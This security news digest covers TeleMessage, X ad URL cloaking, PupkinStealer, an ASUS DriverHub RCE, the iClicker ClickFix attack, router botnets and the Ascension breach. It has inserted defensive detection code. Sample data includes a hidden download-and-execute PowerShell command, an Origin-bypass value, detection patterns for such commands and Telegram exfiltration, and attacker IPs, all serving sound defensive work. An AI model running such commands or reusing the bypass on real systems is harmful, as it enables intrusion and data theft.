security meets culture
CISA Warns of TeleMessage Vuln Despite Low CVSS Score
By Kristina Beek for darkreading
Though the app claims to use end-to-end encryption, hackers have reportedly accessed archived data on the app's servers via a new vulnerability.

The Cybersecurity and Infrastructure Security Agency (CISA) is warning users of a privacy vulnerability under exploitation in the messaging application TeleMessage, the very same one used by Michael Waltz, former national security adviser to President Donald Trump.
TeleMessage makes modified versions of popular messaging applications such as Signal, WhatsApp, Telegram, and WeChat. TeleMessage's knockoff Signal app, known as TM SGNL, looks identical to the authentic version of Signal. The only difference is that it archives copies of every message "to a destination determined by the TeleMessage customer."
This is according to information security and software engineer Micah Lee, who posted an analysis of the weakness on his blog and asserted that the app uses "misleading marketing" because it claims to support end-to-end encryption, when it actually doesn't.
TM SGNL archives to a server hosted on AWS that has plaintext access not only to the Signal chat logs it is archiving but also to the chat logs of Telegram, WeChat, and WhatsApp. TM SGNL is also interoperable with Signal, Lee explained: when a user registers a new account with TM SGNL, they are registering it with the official Signal server, which lets them message genuine Signal users and vice versa.
"If you're a Signal user, you have no way of knowing when you're talking to a TM SGNL user, because the apps are nearly identical and use the same infrastructure," wrote Lee in the post. "This is how Mike Waltz could accidentally add The Atlantic editor-in-chief Jeffrey Goldberg to a group chat where they discussed bombing an apartment building full of civilians: Waltz was presumably using TM SGNL, and Goldberg was presumably using Signal."
While the aforementioned leak occurred due to an error made by a user, hackers could exploit the lack of end-to-end encryption on TM SGNL and obtain user data from TeleMessage's archive server.
The vulnerability, tracked as CVE-2025-47729, is still undergoing analysis by the National Institute of Standards and Technology (NIST) but has been assigned a CVSS score of 1.9. Despite this low severity score, the security issue has been exploited in the wild by hackers who have obtained user data, such as private Telegram messages, from the TeleMessage archive server. CISA added the flaw to its Known Exploited Vulnerabilities (KEV) catalog on Monday.
As for users, there isn't much they can do on their end at this time to mitigate the flaw until it's addressed on the server-side, beyond discontinuing their use of the product.
New Attack Exploits X/Twitter Ad URL Feature to Deceive Users
By Aman Mishra for gbhackers

Silent Push Threat Analysts have recently exposed a sophisticated financial scam leveraging a vulnerability in X/Twitter's advertising display URL feature to deceive users.
This attack manipulates the platform's URL display mechanism to present a legitimate-looking link, such as "From CNN[.]com," while redirecting unsuspecting victims to a malicious cryptocurrency scam site impersonating Apple's brand.
This campaign, centered around a fictitious "Apple iToken," represents a new level of deception in social media advertising fraud, exploiting technical loopholes to trick users into engaging with harmful content.
Spoofed URLs in X/Twitter Ads
The core of this attack lies in an exploit of X/Twitter's URL handling and metadata retrieval process.
When a URL is posted on the platform, X/Twitter's bot fetches metadata using a consistent User Agent (UA) string to generate a preview card.
Malicious actors exploit this by configuring their servers to redirect the bot to a benign site like cnn[.]com, while real users are rerouted to a fraudulent domain such as ipresale[.]world.
Alternatively, attackers use URL shorteners like bit[.]ly to initially point to a legitimate site for metadata collection, later updating the redirect to a malicious destination.
This results in a preview card that displays a trusted domain, masking the true, harmful landing page.
After the redirect chain, often involving intermediate links like t[.]co/OswjDCIcFI, victims land on scam sites promoting a fake cryptocurrency presale.
These sites, complete with forged endorsements from Apple CEO Tim Cook, lure users into creating accounts and transferring funds to one of 22 provided crypto wallets across various blockchain networks, including Bitcoin, Ethereum, and Solana.
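The cloaking described above can be checked for from the defender's side by resolving the advertised link twice, once as the platform's preview bot and once as a browser, and comparing the landing domains. The following is an added example, not Silent Push's tooling; the hostnames are the ones the article names, the redirect table standing in for live servers is constructed, and nothing here touches the network.

```python
from urllib.parse import urlsplit

# Constructed stand-in for HTTP responses: (url, client class) -> Location header.
# No entry means that URL answered with a final page rather than a redirect.
FAKE_LOCATIONS = {
    # The platform's own shortener forwards every client the same way.
    ("https://t.co/OswjDCIcFI", "bot"): "https://bit.ly/constructed-id",
    ("https://t.co/OswjDCIcFI", "browser"): "https://bit.ly/constructed-id",
    # The actor's redirector sends the preview bot to a trusted site ...
    ("https://bit.ly/constructed-id", "bot"): "https://www.cnn.com/",
    # ... and real visitors onward into the scam infrastructure.
    ("https://bit.ly/constructed-id", "browser"): "https://chopinkos.digital/",
    ("https://chopinkos.digital/", "browser"): "https://itokensale.live/",
}


def fake_fetch_location(url, client):
    """Stand-in for an HTTP request that returns the Location header or None.
    A real implementation would send the platform bot's UA for 'bot' and a
    desktop browser UA for 'browser', and must not follow redirects itself."""
    return FAKE_LOCATIONS.get((url, client))


def registrable_domain(host):
    """Last two labels: adequate for .com/.live/.digital; production code
    should consult the Public Suffix List for co.uk-style suffixes."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def follow_chain(url, client, fetch_location, max_hops=10):
    """Follow Location redirects for one client class and return the chain.
    Loops and excessive hops abort, so a hostile server cannot stall the check."""
    chain, seen = [url], {url}
    while len(chain) <= max_hops:
        nxt = fetch_location(chain[-1], client)
        if nxt is None:
            return chain
        if nxt in seen:
            raise ValueError(f"redirect loop at {nxt}")
        seen.add(nxt)
        chain.append(nxt)
    raise ValueError("too many redirects")


def cloaking_verdict(url, fetch_location=fake_fetch_location):
    """Compare where the preview bot ends up with where a browser ends up.
    The bot's final domain is what the ad card will display as the source;
    a different browser landing domain means the card is lying."""
    bot_chain = follow_chain(url, "bot", fetch_location)
    browser_chain = follow_chain(url, "browser", fetch_location)
    displayed = registrable_domain(urlsplit(bot_chain[-1]).hostname)
    landing = registrable_domain(urlsplit(browser_chain[-1]).hostname)
    return {
        "displayed_domain": displayed,
        "landing_domain": landing,
        "cloaked": displayed != landing,
        "bot_chain": bot_chain,
        "browser_chain": browser_chain,
    }


if __name__ == "__main__":
    v = cloaking_verdict("https://t.co/OswjDCIcFI")
    print("card shows:", v["displayed_domain"], "| browser lands on:", v["landing_domain"])
    print("cloaked:", v["cloaked"])
```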
Silent Push Uncovers Crypto Scam Network
Further investigation by Silent Push revealed a sprawling network of nearly 90 related domains, active since 2024, likely operated by the same threat actor group.
The campaign expanded with a second X/Twitter ad on May 5, 2025, redirecting through chopinkos[.]digital to itokensale[.]live, displaying nearly identical scam content.
Using advanced tools like Silent Push's Web Resource Scan, analysts identified reused files, favicons, and infrastructure fingerprints, such as specific IP addresses (e.g., 51.15.17[.]214) and name servers (ns1.chsw.host), linking these domains to a broader ecosystem of financial fraud.
Many sites also abuse Apple trademarks or impersonate other brands, with some tied to suspicious .ru domains, though direct attribution remains uncertain.
This sophisticated operation underscores the evolving tactics of cybercriminals in exploiting social media platforms for financial gain, highlighting the urgent need for enhanced URL validation mechanisms and user awareness.
Below is a curated list of Indicators of Compromise (IOCs) associated with this campaign, provided by Silent Push to aid in threat detection and mitigation:
PupkinStealer - .NET Malware Steals Browser Data and Exfiltrates via Telegram
By Aman Mishra for gbhackers

A new information-stealing malware dubbed "PupkinStealer" has emerged as a significant threat to individuals and enterprises.
Developed in C# using the .NET framework, this 32-bit GUI-based Windows executable targets sensitive user data with a focused and efficient approach.
First observed in April 2025, PupkinStealer is designed to harvest a specific range of data, including browser credentials, personal files from desktops, session information from messaging platforms like Telegram and Discord, and desktop screenshots.
What makes this malware particularly insidious is its method of exfiltration, leveraging the Telegram Bot API to transmit stolen data to attacker-controlled servers with minimal traceability.
A New Threat in the Cyber Landscape
PupkinStealer, with a file size of 6.21 MB and identified by the MD5 hash fc99a7ef8d7a2028ce73bf42d3a95bce, operates by initiating multiple asynchronous tasks upon execution.
Its Main() method, managed by the .NET Common Language Runtime (CLR), orchestrates data theft through distinct modules.
One primary function targets Chromium-based browsers such as Chrome, Edge, and Opera by extracting decryption keys from Local State files and decrypting saved credentials stored in SQLite databases using AES-GCM algorithms.
Additionally, it scans the victim's desktop for files with extensions like .pdf, .txt, and .jpg, copying them to a temporary directory.
The malware also exfiltrates Telegram session data by copying the 'tdata' folder, enabling unauthorized account access without credentials, while Discord tokens are harvested from leveldb storage using regular expressions for potential impersonation.
Technical Breakdown of Malicious Operations
A screenshot of the primary screen at 1920×1080 resolution is captured and, along with all collected data, compressed into a ZIP archive with embedded metadata such as username, IP address, and Security Identifier (SID).
According to Cyfirma's report, this archive, often named in the format [Username]@ardent.zip, is then sent to a Telegram bot identified as 'botkanalchik_bot' using a crafted API URL, with detailed system information in the caption.
Attributed to a developer alias "Ardent," as evidenced by embedded code strings, PupkinStealer lacks advanced obfuscation or persistence mechanisms, relying instead on low-profile execution to evade detection.
Its use of legitimate services like Telegram for command-and-control highlights a growing trend among cybercriminals favoring anonymity and ease of use.
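The exfiltration channel described above is visible on the wire as a POST to the Telegram Bot API from a process that has no business using it. The following detection is an added example, not from Cyfirma's report: it runs over constructed endpoint network-connection records (the log format, hostnames, process paths and bot token are all constructed) and redacts the token down to its numeric bot id, since the token is a credential that should not be copied into tickets.

```python
import re

# https://api.telegram.org/bot<bot_id>:<35-char secret>/<method>
BOT_API = re.compile(r"^https://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]{35})/(\w+)")
LARGE_UPLOAD = 1_000_000  # bytes; a sendDocument this big looks like an archive

# Constructed allow-list of (host, process) pairs expected to use the Bot API,
# e.g. an ops alerting bot.  Anything else on a user workstation is suspect.
ALLOWED_BOT_CLIENTS = {("OPS-RUNNER-1", r"C:\Tools\alertbot\python.exe")}

# Constructed token: 10-digit bot id, colon, 35-character secret.
CONSTRUCTED_TOKEN = "1234567890:AAF" + "X" * 32

# Constructed records: timestamp|host|process|method|url|bytes_sent
SAMPLE_LOG = [
    f"2025-04-14T10:02:11Z|WS-042|C:\\Users\\alice\\Downloads\\setup_viewer.exe|POST|"
    f"https://api.telegram.org/bot{CONSTRUCTED_TOKEN}/sendDocument|6512304",
    "2025-04-14T10:02:12Z|WS-042|C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|GET|"
    "https://web.telegram.org/k/|512",
    f"2025-04-14T10:05:00Z|OPS-RUNNER-1|C:\\Tools\\alertbot\\python.exe|POST|"
    f"https://api.telegram.org/bot{CONSTRUCTED_TOKEN}/sendMessage|230",
]


def parse_record(line):
    """Parse one constructed pipe-delimited record into a dict."""
    ts, host, proc, method, url, sent = line.split("|")
    return {"ts": ts, "host": host, "process": proc, "method": method,
            "url": url, "bytes_sent": int(sent)}


def detect_bot_api_exfil(records):
    """Flag Bot API calls from non-allow-listed processes.  A large sendDocument
    is rated high: that is the shape of a stolen-data archive leaving the host."""
    alerts = []
    for r in records:
        m = BOT_API.match(r["url"])
        if not m or (r["host"], r["process"]) in ALLOWED_BOT_CLIENTS:
            continue
        bot_id, _secret, api_method = m.groups()   # secret is dropped, never stored
        big = api_method == "sendDocument" and r["bytes_sent"] >= LARGE_UPLOAD
        alerts.append({
            "ts": r["ts"],
            "host": r["host"],
            "process": r["process"],
            "bot_id": bot_id,
            "api_method": api_method,
            "bytes_sent": r["bytes_sent"],
            "severity": "high" if big else "medium",
            # Proxy/egress block pattern that needs only the public bot id.
            "block_pattern": f"api.telegram.org/bot{bot_id}:*",
        })
    return alerts


if __name__ == "__main__":
    for a in detect_bot_api_exfil(parse_record(l) for l in SAMPLE_LOG):
        print(a["severity"].upper(), a["host"], a["process"], a["api_method"],
              a["bytes_sent"], "bot", a["bot_id"])
```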
As part of a broader landscape of modular infostealers, PupkinStealer underscores the evolving simplicity and accessibility of malware-as-a-service offerings, posing a challenge to cybersecurity defenses.
Organizations are urged to implement robust endpoint security, continuous network monitoring, and user awareness training to mitigate risks associated with such threats.
ASUS DriverHub Flaw Let Malicious Sites Run Commands with Admin Rights
By Bill Toulas for bleepingcomputer

The ASUS DriverHub driver management utility was vulnerable to a critical remote code execution flaw that allowed malicious sites to execute commands on devices with the software installed.
The flaw was discovered by an independent cybersecurity researcher from New Zealand named Paul, aka "MrBruh," who found that the software had poor validation of commands sent to the DriverHub background service.
This allowed the researcher to create an exploit chain utilizing flaws tracked as CVE-2025-3462 and CVE-2025-3463 that, when combined, achieve origin bypass and trigger remote code execution on the target.
The DriverHub problem
DriverHub is ASUS's official driver management tool that is automatically installed on the first system boot when utilizing certain ASUS motherboards.
This software runs in the background, automatically detecting and fetching the latest driver versions for the detected motherboard model and its chipset.
Once installed, the tool remains active and running in the background via a local service on port 53000, continually checking for important driver updates.
Meanwhile, most users don't even know such a service is constantly running on their system.
That service checks the Origin Header of incoming HTTP requests to reject anything that doesn't come from 'driverhub.asus.com.'
However, this check is poorly implemented, as any site that includes that string is accepted even if it's not an exact match to ASUS's official portal.
The second issue lies in the UpdateApp endpoint, which allows DriverHub to download and run .exe files from ".asus.com" URLs without user confirmation.
Stealthy attack flow
An attacker can target any user with ASUS DriverHub running on their system to trick them into visiting a malicious website on their browser. This website then sends "UpdateApp requests" to the local service at 'http://127.0.0.1:53000.'
By spoofing the Origin Header to something like 'driverhub.asus.com.mrbruh.com,' the weak validation check is bypassed, so DriverHub accepts the commands.
In the researcher's demonstration, the commands order the software to download a legitimate ASUS-signed 'AsusSetup.exe' installer from the vendor's download portal, along with a malicious .ini file and .exe payload.
The ASUS-signed installer is silently run as admin and uses the configuration information in the .ini file. This ini file directs the legitimate ASUS driver installer to launch the malicious executable file.
The attack is also made possible by the tool failing to delete files that fail signature checks, like the .ini and payload, which are kept on the host after their download.
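The Origin check described above fails because it tests for a substring rather than an exact origin. The following is an added example, not ASUS's code: the substring pattern side by side with a parse-and-compare check, evaluated against sample Origin values ('driverhub.asus.com' and the bypass value come from the article; the other sample origins are constructed).

```python
from urllib.parse import urlsplit

ALLOWED_HOST = "driverhub.asus.com"


def origin_allowed_weak(origin: str) -> bool:
    """The flawed pattern: any Origin that merely contains the expected host
    is accepted.  Browsers set Origin to the requesting page's own origin, so
    a page served from a sub-domain the attacker controls, such as
    driverhub.asus.com.mrbruh.com, passes this test untouched."""
    return ALLOWED_HOST in origin


def origin_allowed_strict(origin: str) -> bool:
    """Parse the Origin and require an exact scheme, host and port match.
    A missing or 'null' Origin is rejected as well: a local service that
    downloads and executes files must fail closed, not open."""
    if not origin or origin == "null":
        return False
    parts = urlsplit(origin)
    # An Origin header is scheme://host[:port] only; anything more is malformed.
    if parts.scheme != "https" or parts.path or parts.query or parts.fragment:
        return False
    try:
        port = parts.port          # raises ValueError on a non-numeric port
    except ValueError:
        return False
    # .hostname is already lower-cased and stripped of any port.
    return parts.hostname == ALLOWED_HOST and port in (None, 443)


def compare(origins):
    """Run both checks; returns {origin: (weak_result, strict_result)}."""
    return {o: (origin_allowed_weak(o), origin_allowed_strict(o)) for o in origins}


# Constructed sample Origins: the genuine portal, the article's bypass value,
# and other shapes a lenient check wrongly accepts.
SAMPLE_ORIGINS = [
    "https://driverhub.asus.com",
    "https://driverhub.asus.com.mrbruh.com",
    "http://driverhub.asus.com",
    "https://driverhub.asus.com:443",
    "https://driverhub.asus.com:8443",
    "https://evil.example/?ref=driverhub.asus.com",
    "null",
]

if __name__ == "__main__":
    for origin, (weak, strict) in compare(SAMPLE_ORIGINS).items():
        print(f"{origin:48} substring={weak!s:5} exact={strict}")
```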
ASUS' response and user action
ASUS received the researcher's reports on April 8, 2025, and implemented a fix on April 18, after validating it with MrBruh the day before. The hardware giant did not offer the researcher any bounty for his disclosure.
The CVE descriptions, which the Taiwanese vendor submitted, somewhat downplay the issue with the following statement:
"This issue is limited to motherboards and does not affect laptops, desktop computers, or other endpoints," reads the CVE description.
This is confusing, as the mentioned CVEs impact laptops and desktop computers with DriverHub installed.
However, ASUS is clearer in its security bulletin, advising users to quickly apply the latest update.
"This update includes important security updates and ASUS strongly recommends that users update their ASUS DriverHub installation to the latest version," reads the bulletin.
"The latest Software Update can be accessed by opening ASUS DriverHub, then clicking the Update Now button."
MrBruh says he monitored certificate transparency updates and found no other TLS certificates containing the "driverhub.asus.com" string, indicating it was not exploited in the wild.
If you're uncomfortable with a background service automatically fetching potentially dangerous files upon visiting websites, you may disable DriverHub from your BIOS settings.
iClicker Site Hack Targeted Students with Malware via Fake CAPTCHA
By Lawrence Abrams for bleepingcomputer

The website of iClicker, a popular student engagement platform, was compromised in a ClickFix attack that used a fake CAPTCHA prompt to trick students and instructors into installing malware on their devices.
iClicker is a subsidiary of Macmillan and is a digital classroom tool that allows instructors to take attendance, ask live questions or surveys, and track student engagement. It is widely used by 5,000 instructors and 7 million students at colleges and universities across the United States, including the University of Michigan, the University of Florida, and universities in California.
According to a security alert from the University of Michigan's Safe Computing team, the iClicker site was hacked between April 12 and April 16, 2025, to display a fake CAPTCHA that instructed users to press "I'm not a robot" to verify themselves.
However, when visitors clicked on the verification prompt, a PowerShell script was silently copied into the Windows clipboard in what is known as a "ClickFix" social engineering attack.
The CAPTCHA would then instruct users to open the Windows Run dialog (Win + R), paste the PowerShell script (Ctrl + V) into it, and execute it by pressing Enter to verify themselves.
While the ClickFix attack is no longer running on iClicker's site, a person on Reddit launched the command on Any.Run, revealing the PowerShell payload that gets executed.
The PowerShell command used in the iClicker attack was heavily obfuscated, but when executed, it would connect to a remote server at http://67.217.228[.]14:8080 to retrieve another PowerShell script that would be executed.
Obfuscated PowerShell script used in iClicker ClickFix attack. Source: BleepingComputer
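A Run-dialog launch of the kind described above leaves two traces a defender can score: a script host whose parent process is explorer.exe, and the typed text in the RunMRU registry key. The following triage logic is an added example, not from the article or the University of Michigan alert; the process events, RunMRU values and command lines are constructed, and the IP is from the TEST-NET documentation range.

```python
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}

# (label, regex) pairs for the traits the article describes: hidden window,
# download-and-execute, raw-IP server, encoded or policy-bypassing invocation.
INDICATORS = [
    ("hidden window", re.compile(r"(?i)(^|\s)-(w|win|windowstyle)\s+hidden\b")),
    ("encoded command", re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}")),
    ("download-and-execute", re.compile(
        r"(?i)\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b")),
    ("raw IP URL", re.compile(r"(?i)https?://\d{1,3}(\.\d{1,3}){3}(:\d+)?")),
    ("profile/policy bypass", re.compile(r"(?i)(^|\s)-(nop|noprofile|ep\s+bypass|executionpolicy\s+bypass)\b")),
]


def suspicious_indicators(cmdline):
    """Return the labels of every indicator present in a command line."""
    return [label for label, rx in INDICATORS if rx.search(cmdline)]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect_process_events(events):
    """Flag script hosts spawned by explorer.exe (how a Win+R launch appears in
    process-creation telemetry) whose command line carries an indicator.  A bare
    interactive 'powershell' and service-spawned admin scripts are left alone."""
    alerts = []
    for ev in events:
        if basename(ev["Image"]) not in SCRIPT_HOSTS:
            continue
        if basename(ev["ParentImage"]) != "explorer.exe":
            continue
        reasons = suspicious_indicators(ev["CommandLine"])
        if reasons:
            alerts.append({"user": ev["User"], "cmdline": ev["CommandLine"], "reasons": reasons})
    return alerts


def triage_runmru(values):
    """HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU keeps
    what was typed into the Run dialog; each value ends in a literal '\\1'."""
    flagged = []
    for raw in values:
        typed = raw[:-2] if raw.endswith("\\1") else raw
        reasons = suspicious_indicators(typed)
        if reasons:
            flagged.append({"typed": typed, "reasons": reasons})
    return flagged


# Constructed Sysmon-style process-creation events.
SAMPLE_EVENTS = [
    {"User": "LAB\\student1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iex (irm http://203.0.113.10:8080/a)"'},
    {"User": "LAB\\student1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

# Constructed RunMRU values, as exported from the registry.
SAMPLE_RUNMRU = [
    r"notepad\1",
    'powershell -w hidden -nop -c "iex (irm http://203.0.113.10:8080/a)"\\1',
]

if __name__ == "__main__":
    for a in detect_process_events(SAMPLE_EVENTS):
        print("ALERT", a["user"], a["reasons"])
    for f in triage_runmru(SAMPLE_RUNMRU):
        print("RunMRU", f["reasons"], f["typed"])
```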
Unfortunately, it is not known what malware was ultimately installed, as the retrieved PowerShell script was different depending on the type of visitor.
For targeted visitors, it would send a script that downloads malware onto the computer. The University of Michigan says that the malware allowed the threat actor to have full access to the infected device.
For those who were not targeted, such as malware analysis sandboxes, the script would instead download and run the legitimate Microsoft Visual C++ Redistributable, as shown below.
ClickFix attacks have become widespread social engineering attacks that have been used in numerous malware campaigns, including those pretending to be a Cloudflare CAPTCHA, Google Meet, and web browser errors.
From past campaigns, the attack likely distributed an infostealer, which can steal cookies, credentials, passwords, credit cards, and browsing history from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium browsers.
This type of malware can also steal cryptocurrency wallets, private keys, and text files likely to contain sensitive information, such as those named seed.txt, pass.txt, ledger.txt, trezor.txt, metamask.txt, bitcoin.txt, words, wallet.txt, *.txt, and *.pdf.
This data is collected into an archive and sent back to the attacker, where they can use the information in further attacks or sell it on cybercrime marketplaces.
The stolen data can also be used to conduct widescale breaches that lead to ransomware attacks. As the attack targeted college students and instructors, the goal could have been to steal credentials to conduct attacks on college networks.
BleepingComputer contacted Macmillan multiple times this week with questions regarding this attack, but the company did not respond.
However, BleepingComputer later found that iClicker published a security bulletin on its website on May 6 but included a <meta name='robots' content='noindex, nofollow' /> tag in the page's HTML, preventing the document from being indexed by search engines and thus making it more difficult to find information on the incident.
"We recently resolved an incident affecting the iClicker landing page-- iClicker.com. Importantly, no iClicker data, apps, or operations were impacted and the identified vulnerability on the iClicker landing page has been resolved," reads iClicker's security bulletin.
"What happened: an unrelated 3rd-party placed a false Captcha on our iClicker landing page before users logged into iClicker on our website. This 3rd-party was hoping to get users to click on the false captcha similar to what we unfortunately experience quite often in phishing emails these days."
"Out of an abundance of caution, we recommend that any faculty or student who encountered and clicked on the false Captcha from April 12- April 16 on our website run security software to ensure their devices remain protected."
Users who accessed iClicker.com while the site was hacked and followed the fake CAPTCHA instructions should immediately change their iClicker password, and if the command was executed, change all passwords stored on their computer to a unique one for every site.
To help with this, it is suggested that you use a password manager like BitWarden or 1Password.
It's important to note that users who accessed iClicker through the mobile app or did not encounter the fake CAPTCHA are not at risk from the attack.
These Are the 6 Ways Scammers Use TikTok to Infect Your Devices with Malware
By Vinayak Guhanarayan for makeuseof

There aren't many social media platforms as engaging as TikTok, but its popularity also makes it a target for scammers. If you love scrolling TikTok, watch out for these scams that could infect your device with malware.
Fake 'Unfilter' or 'Reveal' Tools
Scammers often promote tools that help people remove filters or blurred/blacked-out sections from videos. To make it more convincing, a scammer might show a blurred image in their video, pretend to run it through a special tool, and then cut to a seemingly unfiltered version, which creates the illusion that this special tool helps unblur or unfilter elements.
In reality, these videos are completely fabricated. If you download the tool they're advertising, you risk installing malware on your device. So, if you see a video on TikTok that advertises similar tools, it's best to avoid clicking any links in the description. There are several legit ways to unblur images, but none magically reveal sensitive elements in a photo. Anyone claiming to have a tool that does this is likely trying to mislead you.
'Secret' or 'Pro' TikTok Apps for Access to Exclusive Features
TikTok has a few companion apps, like TikTok Studio (meant for creators) and TikTok Lite (a data-friendly version of the regular app). But these versions are not widely known. There are also TikTok Business accounts, but this is just a distinct account type you can switch to within your app (Profile > Menu > Account, then select Switch to Business Account). If you're unfamiliar with TikTok, it's easy to assume that there might be a secret version of the app or a Pro account that offers exclusive features.
Scammers take advantage of this and advertise fake TikTok apps. They usually claim these apps offer exclusive perks, like an increased follower count or access to hidden editing tools. The downside, of course, is that if you come across one of these shady videos promoting such an app, and you download it, you might just end up infecting your device with malware.
Fake Giveaways
Scammers run fake giveaways on many social media platforms, including TikTok. These giveaways usually promise an expensive gift to the winner, like the latest iPhone, gift cards, or even just money, making them all the more enticing to enter.
Typically, giveaway videos on TikTok ask you to submit your entry by navigating to a URL mentioned in the description or the bio section. Once you're there, you might be prompted to share sensitive details that could be used for identity theft, or you might be asked to download an app to complete your entry, which can lead to malware being installed on your device. Now, I'm not saying legit influencers and companies don't run giveaways, but these giveaways are usually posted by verified accounts. If the giveaway feels shady, it's best not to proceed.
QR Code Scams
Another sneaky tactic scammers use on TikTok is posting videos with QR codes. Viewers are asked to scan the QR code to access sensitive content, hidden features, or enter giveaways.
But these QR codes are often fake and simply exist to redirect you to malicious websites that download malware onto your device. Given that scams of this nature are really common these days, be sure to learn how to spot fake QR codes.
Messages From Fake Celebrity/Influencer Accounts
Scammers often create fake accounts for celebrities and influencers to trick people into believing they're interacting with someone famous. These accounts look pretty similar to the real ones, and might even have the same photos, which are stolen, of course. Once the account has sufficient followers, scammers start sending direct messages to people. These messages might include links to phishing pages or might prompt a malware download, but it's hard to tell because you're not expecting someone famous to scam you.
If you receive a DM from a famous person on TikTok or any other social media platform, for that matter, don't click anything or continue interacting unless you're sure it's legit, which you can determine by checking if there's a blue checkmark beside the account name. That said, scammers might also use photos with blue checkmarks to make the account seem authentic. So, verify if the blue checkmark appears next to the account name in the profile header before interacting with an account.
Fake Copyright Violation Notices
If you're a creator or even just a casual TikTok user who creates the occasional video for yourself, receiving a copyright violation notice can be alarming. Scammers try to take advantage of this by sending fake copyright violation notices that seem like they came from TikTok.
These notices might include a link to view the entire message or verify the details of your account. With these fake notices, though, nothing good comes from clicking the included link. If you receive a similar notice, don't act hastily. Check the official TikTok app and your account for any notifications, as well as your email. If you're unsure, use TikTok's support center to report a problem.
Social media is packed with scam ads and videos. While some of them are easy to spot, others are cleverly disguised and might even seem like they come from a legit influencer or TikTok itself. Staying on guard and avoiding suspicious links can go a long way in protecting you and keeping your device safe from malware.
If Your Router is on This FBI List, You Need to Upgrade it Immediately
By Yadullah Abidi for makeuseof

Routers are critical pieces of network infrastructure that can theoretically last for decades. But if they are too old, hackers might come knocking.
Old Routers Are a Threat to Your Network
The FBI has discovered a group of hackers exploiting old routers to pull off cyberattacks. The agency's announcement includes a list of 13 routers that have reached "end of life" status, meaning they no longer receive software updates to fix known vulnerabilities.
The following routers are being targeted:
- Cisco M10
- Cisco Linksys E1500
- Cisco Linksys E1550
- Cisco Linksys WRT610N
- Cisco Linksys E1000
- Cradlepoint E100
- Cradlepoint E300
- Linksys E1200
- Linksys E2500
- Linksys E3200
- Linksys WRT320N
- Linksys E4200
- Linksys WRT310N
All routers have a management interface that can be accessed by connecting to the router via Ethernet or WiFi, or over the internet. If the interface is exposed to the internet, hackers can exploit a router's known vulnerability to upload malware and gain administrator access.
The malware being used in the attack is called TheMoon, first found on compromised routers in 2014. The FBI's announcement claims that it doesn't require a password to infect routers. The malware scans for open ports and sends a command to a vulnerable script on the router. Once the command executes, it establishes a command and control (C2) server, which then responds with further instructions.
The malware uploaded to the targeted routers lets hackers maintain persistent access to the device, allowing them to use it as part of a larger botnet. The botnets are then used to launch coordinated DDoS attacks or sold as a proxy service that hackers use to conceal their IP address and identity.
The agency also seized 2 websites-- Anyproxy and 5Socks-- which were using the hacked routers to offer proxy services to "help cybercriminals hide their activities." The sites have been updated to show a Justice Department seizure notice.
How Can You Protect Yourself?
If you use one of the routers mentioned above, the best course of action is to upgrade your router to a newer model. Aside from better security, you'll also enjoy faster internet speeds and a more stable WiFi connection. Even if your router isn't on the list above, but has reached end-of-life status, a replacement is the way to go.
In case you can't replace your router right away, disable any remote management or administration features in the router's control panel. The specific instructions for doing so will vary from router to router, so I recommend looking up your router's model number for more information. Your router is one of the most vulnerable devices in your home, and should be secured appropriately.
For those of you who do own newer routers, check for new updates frequently to make sure your router is protected against any vulnerabilities that hackers can exploit. Unless you explicitly need your router's remote management capabilities, I'd recommend turning the feature off for better protection.
Ascension Says Recent Data Breach Affects Over 430,000 Patients
By Sergiu Gatlan for bleepingcomputer

Ascension, one of the largest private healthcare systems in the United States, has revealed that a data breach disclosed last month affects the personal and healthcare information of over 430,000 patients.
The healthcare network has over 142,000 employees, operates 142 hospitals nationwide, and reported a revenue of $28.3 billion in 2023.
As Ascension revealed in breach notification letters sent to affected individuals in April, their information was stolen in a data theft attack that impacted a former business partner in December.
Depending on the impacted patient, the attackers could access personal health information related to inpatient visits, including the physician's name, admission and discharge dates, diagnosis and billing codes, medical record number, and insurance company name. They could also gain access to personal information, including name, address, phone number(s), email address, date of birth, race, gender, and Social Security numbers (SSNs).
"On December 5, 2024, we learned that Ascension patient information may have been involved in a potential security incident. We immediately initiated an investigation to determine whether and how a security incident occurred," Ascension said.
"Our investigation determined on January 21, 2025, that Ascension inadvertently disclosed information to a former business partner, and some of this information was likely stolen from them due to a vulnerability in 3rd-party software used by the former business partner."
While Ascension didn't reveal the total number of affected individuals at the time, an April 29 filing said that the incident impacted 114,692 individuals in Texas, and the company also told Massachusetts' Office of the Attorney General that 96 residents had their medical records and SSNs exposed in the incident.
However, the healthcare giant also disclosed in an April 28 filing with the US Department of Health & Human Services (HHS) that wasn't published until today that the data breach affected 437,329 individuals.
Ascension offers 2 years of free identity monitoring services to those impacted by this incident, including credit monitoring, fraud consultation, and identity theft restoration.
Although Ascension didn't share any details regarding the breach affecting its former business partner, the timeline of the breach implies that the attack was part of widespread Clop ransomware data theft attacks that exploited a zero-day flaw in Cleo secure file transfer software.
Last year, Ascension also notified almost 5.6 million patients and employees that their personal, financial, insurance, and health information had been stolen in a May 2024 Black Basta ransomware attack.
After the incident, the healthcare organization revealed that the ransomware breach resulted from an employee downloading a malicious file onto a company device.
Following the May 2024 attack, employees were forced to keep track of procedures and medications on paper, as patients' electronic records couldn't be accessed. Ascension also had to pause some non-emergent elective procedures, tests, and appointments and redirect emergency medical services to unaffected healthcare units to prevent triage delays.
Beware of Phone Scams Demanding Money for 'Missed Jury Duty'
